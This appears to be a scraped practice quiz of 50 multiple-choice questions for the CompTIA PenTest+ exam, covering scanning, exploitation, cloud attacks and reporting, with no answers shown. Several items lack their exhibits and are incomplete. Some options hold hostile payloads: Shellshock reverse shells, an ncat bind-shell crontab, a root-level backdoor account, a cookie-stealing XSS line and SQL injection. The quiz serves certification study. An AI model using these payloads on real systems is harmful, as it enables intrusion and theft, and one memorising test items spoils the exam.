Title of test:
PenTest+1

Description:
PenTest exam

Author:
AVATAR

Creation Date:
05/07/2023

Category:
Others

Number of questions: 50
Content:
Which of the following are the BEST methods to protect against this type of attack? (Choose two.)
  Web-application firewall
  Parameterized queries
  Output encoding
  Session tokens
  Input validation
  Base64 encoding

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?
  Reach out to the primary point of contact
  Try to take down the attackers
  Call law enforcement officials immediately
  Collect the proper evidence and add to the final report

A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based on the version number of the service. Which of the following methods would BEST support validation of the possible findings?
  Manually check the version number of the VoIP service against the CVE release
  Test with proof-of-concept code from an exploit database
  Review SIP traffic from an on-path position to look for indicators of compromise
  Utilize an nmap -sV scan against the service

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
  nmap 192.168.1.1-5 -PU22-25,80
  nmap 192.168.1.1-5 -PA22-25,80
  nmap 192.168.1.1-5 -PS22-25,80
  nmap 192.168.1.1-5 -Ss22-25,80

A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?
  Immunity Debugger
  OllyDbg
  GDB
  Drozer

A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?
  VRFY and EXPN
  VRFY and TURN
  EXPN and TURN
  RCPT TO and VRFY
Which of the following tools provides Python classes for interacting with network protocols?
  Responder
  Impacket
  Empire
  PowerSploit

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?
  Alternate data streams
  PowerShell modules
  MP4 steganography
  PsExec

A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future?
  Enforce mandatory employee vacations
  Implement multifactor authentication
  Install video surveillance equipment in the office
  Encrypt passwords for bank account information

A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
  nmap -p0 -T0 -sS 192.168.1.10
  nmap -sA -sV --host-timeout 60 192.168.1.10
  nmap -f --badsum 192.168.1.10
  nmap -A -n 192.168.1.10

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
  Analyze the malware to see what it does
  Collect the proper evidence and then remove the malware
  Do a root-cause analysis to find out how the malware got in.
  Remove the malware immediately.
  Stop the assessment and inform the emergency contact.

A penetration tester runs the following command on a system: find / -user root -perm -4000 -print 2>/dev/null
Which of the following is the tester trying to accomplish?
  Set the SGID on all files in the / directory
  Find the /root directory on the system
  Find files with the SUID bit set
  Find files that were created during exploitation and move them to /dev/null
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:
  Hydra and crunch
  Netcat and cURL
  Burp Suite and DIRB
  Nmap and OWASP ZAP

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?
  Executive summary of the penetration-testing methods used
  Bill of materials including supplies, subcontracts, and costs incurred during assessment
  Quantitative impact assessments given a successful software compromise
  Code context for instances of unsafe type-casting operations

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
  Have a full TCP connection
  Send a "hello" payload
  Wait for a response
  Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?
  Run nmap -Pn -sV -script vuln <IP address>.
  Employ an OpenVAS simple scan against the TCP port of the host.
  Create a script in the Lua language and use it with NSE.
  Perform a credentialed scan with Nessus.

A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement?
  Direct-to-origin
  Cross-site scripting
  Malware injection
  Credential harvesting

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?
  Weekly
  Monthly
  Quarterly
  Annually

A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?
  Halt the penetration test.
  Conduct an incident response
  Deconflict with the penetration tester
  Assume the alert is from the penetration test
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
  Run nmap with the -O, -p22, and -sC options set against the target
  Run nmap with the -sV and -p22 options set against the target
  Run nmap with the --script vulners option set against the target
  Run nmap with the -sA option set against the target

A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?
  iam_enum_permissions
  iam_privesc_scan
  iam_backdoor_assume_role
  iam_bruteforce_permissions

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?
  Add a dependency checker into the tool chain
  Perform routine static and dynamic analysis of committed code
  Validate API security settings before deployment
  Perform fuzz testing of compiled binaries

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?
  Cross-site request forgery
  Server-side request forgery
  Remote file inclusion
  Local file inclusion

When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?
  Clarify the statement of work
  Obtain an asset inventory from the client
  Interview all stakeholders
  Identify all third parties involved

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment. Which of the following actions should the tester take?
  Perform forensic analysis to isolate the means of compromise and determine attribution.
  Incorporate the newly identified method of compromise into the red team's approach
  Create a detailed document of findings before continuing with the assessment
  Halt the assessment and follow the reporting procedures as outlined in the contract
Which of the following objectives is the tester attempting to achieve?
  Determine active hosts on the network.
  Set the TTL of ping packets for stealth.
  Fill the ARP table of the networked devices
  Scan the system on the most used ports

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
  Whether the cloud service provider allows the penetration tester to test the environment
  Whether the specific cloud services are being used by the application
  The geographical location where the cloud services are running
  Whether the country where the cloud service is based has any impeding laws

A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?
  Perform XSS.
  Conduct a watering-hole attack
  Use BeEF
  Use browser autopwn

A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company's web presence. Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)
  IP addresses and subdomains
  Zone transfers
  DNS forward and reverse lookups
  Internet search engines
  Externally facing open ports
  Shodan results

A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
  Forensically acquire the backdoor Trojan and perform attribution
  Utilize the backdoor in support of the engagement
  Continue the engagement and include the backdoor finding in the final report
  Inform the customer immediately about the backdoor

Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)
  The CVSS score of the finding
  The network location of the vulnerable device
  The vulnerability identifier
  The client acceptance form
  The name of the person who found the flaw
  The tool used to find the issue
A penetration tester performs the following command: curl -I --http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?

  HTTP/2 200
  ...
  x-frame-options: SAMEORIGIN
  x-xss-protection: 1; mode=block
  x-content-type-options: nosniff
  referrer-policy: strict-origin
  strict-transport-security: max-age=31536000; includeSubdomains; preload

  <!DOCTYPE html>
  <html lang="en">
  <head>
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"
  </head>
  <body lang="en">
  </body>
  </html>

  Total% Received% Xferd% Avarage Speed Time Time Time Current 100 1698k 100 1698k 00 1566k 0 Dload Upload 00:01 00:01 - 1565k

  ####################################################################

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?
  John the Ripper
  Hydra
  Mimikatz
  Cain and Abel

A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results?
  Root user
  Local administrator
  Service
  Network administrator

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name-serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?
  Create a custom password dictionary as preparation for password spray testing.
  Recommend using a password manager/vault instead of text files to store passwords securely
  Recommend configuring password complexity rules in all the systems and applications.
  Document the unprotected file repository as a finding in the penetration-testing report.

Which of the following is the MOST effective person to validate results from a penetration test?
  Third party
  Team Leader
  Chief Information Officer
  Client

A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
  Pre-engagement interaction (scoping and ROE)
  Intelligence gathering (reconnaissance)
  Threat modeling
  Vulnerability analysis
  Exploitation and post exploitation
  Reporting
Which of the following methodologies does the client use?
  OWASP Web Security Testing Guide
  PTES technical guidelines
  NIST SP 800-115
  OSSTMM
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?
  A firewall or IPS blocked the scan.
  The penetration tester used unsupported flags
  The edge network device was disconnected
  The scan returned ICMP echo replies

A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?
  ROE
  SLA
  MSA
  NDA

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?
  nmap -vv -sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan
  nmap -vv -sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
  nmap -vv -sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
  nmap -vv -sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
  Smurf
  Ping Flood
  Fraggle
  Ping of Death

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?
  A quick description of the vulnerability and a high-level control to fix it
  Information regarding the business impact if compromised
  The executive summary and information regarding the testing company
  The rules of engagement from the assessment

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
  exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
  exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
  exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find /-perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
  exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?
  NIST SP 800-53
  OWASP Top 10
  MITRE ATT&CK framework
  PTES technical guidelines

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?
  HTTPS communication
  Public and private keys
  Password encryption
  Sessions and cookies

A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?
  OpenVAS
  Nikto
  SQLmap
  Nessus

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?
  schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
  wmic startup get caption,command
  crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
  sudo useradd -ou 0 -g 0 user

A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements?
  "cisco-ios" "admin+1234"
  "cisco-ios" "no-password"
  "cisco-ios" "default-passwords"
  "cisco-ios" "last-modified"

A tester who is performing a penetration test on a website receives the following output:
  Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62
Which of the following commands can be used to further attack the website?
  <script>var adr= `../evil.php?test=' + escape(document.cookie);</script>
  ../../../../../../../../../../etc/passwd
  /var/www/html/index.php;whoami
  1 UNION SELECT 1, DATABASE(),3--

A penetration tester conducted a vulnerability scan against a client's critical servers and found the following
Which of the following would be a recommendation for remediation?
  Deploy a user training program
  Implement a patch management plan
  Utilize the secure software development life cycle
  Configure access controls on each of the servers

A company that develops embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?
  The reverse-engineering team may have a history of selling exploits to third parties.
  The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
  The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
  The reverse-engineering team will be given access to source code for analysis.